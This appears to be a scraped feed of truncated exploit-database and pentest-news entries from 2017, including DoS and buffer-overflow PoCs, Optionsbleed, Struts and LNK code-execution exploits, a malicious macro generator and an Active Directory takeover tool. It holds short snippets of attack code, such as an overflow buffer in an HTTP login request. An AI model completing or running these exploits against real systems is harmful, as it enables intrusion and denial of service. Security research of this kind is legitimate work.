UEFI Firmware Parser
The UEFI firmware parser is a simple module and set of scripts for parsing, extracting, and recreating UEFI firmware volumes. This includes parsing modules for BIOS, OptionROM, Intel ME and other formats too. Please use the example scripts for parsing tutorials. Installation This module is includ...
Dnsmasq < 2.78 - Information Leak Exploit
Exploit for multiple platforms in category dos / poc ''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html Sadly, there are no easy docker setup...
FileRun 2017.09.18 SQL Injection
!/usr/bin/env python Exploit Title: FileRun =2017.09.18 Date: September 29, 2017 Exploit Author: SPARC Vendor Homepage: https://www.filerun.com/ Software Link: http://f.afian.se/wl/?id=EHQhXhXLGaMFU7jI8mYNRN8vWkG9LUVP&recipient=d3d3LmZpbGVydW4uY29t Version: 2017.09.18 Tested on: Ubuntu 16.04.3,...
Sync Breeze Enterprise 10.0.28 - Denial-of-Service (PoC)
!/usr/bin/python import socket import sys try: server = sys.argv1 port = 80 size = 800 inputBuffer = b"A" size content = b"username=" + inputBuffer + b"&password=A" buffer = b"POST /login HTTP/1.1\r\n" buffer += b"Host: " + server.encode + b"\r\n" buffer += b"User-Agent: Mozilla/5.0 X11; Linux866...
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak
!/usr/bin/env python3 Optionsbleed proof of concept test by Hanno Böck import argparse import urllib3 import re def testbleedurl, args: r = pool.request'OPTIONS', url try: allow = strr.headers"Allow" except KeyError: return False if allow in dup: return dup.appendallow if allow == "": print"empty...
Astaro Security Gateway 7 - Remote Code Execution
Astaro Security Gateway 7 - Remote Code Execution !/usr/bin/python Astaro Security Gateway v7 - Unauthenticated Remote Code Execution Exploit Authors: Jakub Palaczynski and Maciej Grabiec Tested on versions: 7.500 and 7.506 Date: 13.12.2016 Vendor Homepage: https://www.sophos.com/ CVE:...
Exploit for Deserialization of Untrusted Data in Apache Struts
apache-struts-pwn - CVE-2017-9805 Exploit ============ An...
Exploit for Deserialization of Untrusted Data in Apache Struts
struts-pwn - CVE-2017-9805 Exploit ============ An exploi...
Tor: [rt.torproject.org] No Rate Limiting on Login Form
Vulnerability description not provided...
VX Search Enterprise 10.0.14 Buffer Overflow
!/usr/bin/env python Exploit Title : VX Search Enterprise v10.0.14 Remote Buffer Overflow CVE-2017-13708 Discovery by : Anurag Srivastava and Nipun Jaswal Credits : Team Pyramid Email : [email protected] Website : www.pyramidcyber.com Discovery Date : 26/08/2017 Software Link :...
Dup Scout Enterprise 9.9.14 - Remote Buffer Overflow (SEH)
Dup Scout Enterprise 9.9.14 - Remote Buffer Overflow SEH !/usr/bin/env python Exploit Title: Dup Scout Enterprise v 9.9.14 Date: 2017-08-25 Exploit Author: Nipun Jaswal & Anurag Srivastava Author Homepage: www.pyramidcyber.com Vendor Homepage: http://www.dupscout.com Software Link:...
VX Search Enterprise 9.9.12 - 'Import Command' Local Buffer Overflow
!/usr/bin/python Exploit Title : VX Search Enterprise v9.9.12 - 'Import Command' Buffer Overflow Discovery by : Anurag Srivastava Email : [email protected] Website : www.pyramidcyber.com Discovery Date : 22/08/2017 Software Link :...
The Malicious Macro Generator!
PenTestIT RSS Feed I'm sure you remember my older post about the malicious office document generator and the office exploitation toolkit. Just a refresher - Luckystrike is the open source script that helps you create malicious Microsoft Office documents using PowerShell and MicroSploit is an open...
Automate Getting Domain Admin Using Empire: DeathStar
DeathStar is a Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments using a variety of techniques. Installation Currently, for DeathStar to work you're going to have to install byt3bl33d3r's fork of Empire until this pull request...
Tomabo MP4 Converter 3.19.15 - Denial of Service Exploit
Exploit for Windows platform in category dos / poc !/usr/bin/python Exploit Title: Tomabo MP4 Converter DOS Date: 13/08/17 Exploit Author: Andy Bowden Vendor Homepage: http://www.tomabo.com/ Software Link: http://www.tomabo.com/mp4-converter/index.html Version: 3.19.15 Tested on: Windows 7 x86 CV...
Internet Download Manager 6.28 Build 17 - Local Buffer Overflow (SEH Unicode)
Internet Download Manager 6.28 Build 17 - Local Buffer Overflow SEH Unicode !/usr/bin/python Exploit Title: Internet Download Manager 6.28 Build 17 - 'Find file' SEH Buffer Overflow Unicode Date: 14-06-2017 Exploit Author: f3ci Tested on: Windows 7 SP1 x86 How to exploit: Open IDM - Downloads -...
Tomabo MP4 Converter 3.19.15 - Denial of Service
Tomabo MP4 Converter 3.19.15 - Denial of Service !/usr/bin/python Exploit Title: Tomabo MP4 Converter DOS Date: 13/08/17 Exploit Author: Andy Bowden Vendor Homepage: http://www.tomabo.com/ Software Link: http://www.tomabo.com/mp4-converter/index.html Version: 3.19.15 Tested on: Windows 7 x86 CVE ...
Tomabo MP4 Converter 3.19.15 - Denial of Service
!/usr/bin/python Exploit Title: Tomabo MP4 Converter DOS Date: 13/08/17 Exploit Author: Andy Bowden Vendor Homepage: http://www.tomabo.com/ Software Link: http://www.tomabo.com/mp4-converter/index.html Version: 3.19.15 Tested on: Windows 7 x86 CVE : None Generate a .m3u file using the python scri...
Microsoft Windows - .LNK Shortcut File Code Execution
Microsoft Windows - .LNK Shortcut File Code Execution !/usr/bin/python -- coding: utf-8 -- Title : CVE-2017-8464 | LNK Remote Code Execution Vulnerability CVE : 2017-8464 Authors : ykoster, nixawk Notice : Only for educational purposes. Support : python2 import struct def generateSHELLLINKHEADER:...
Microsoft Windows - '.LNK' Shortcut File Code Execution
!/usr/bin/python -- coding: utf-8 -- Title : CVE-2017-8464 | LNK Remote Code Execution Vulnerability CVE : 2017-8464 Authors : ykoster, nixawk Notice : Only for educational purposes. Support : python2 import struct def generateSHELLLINKHEADER: | | | | | | | | | | | | | | | | | | | | | | | | | | |...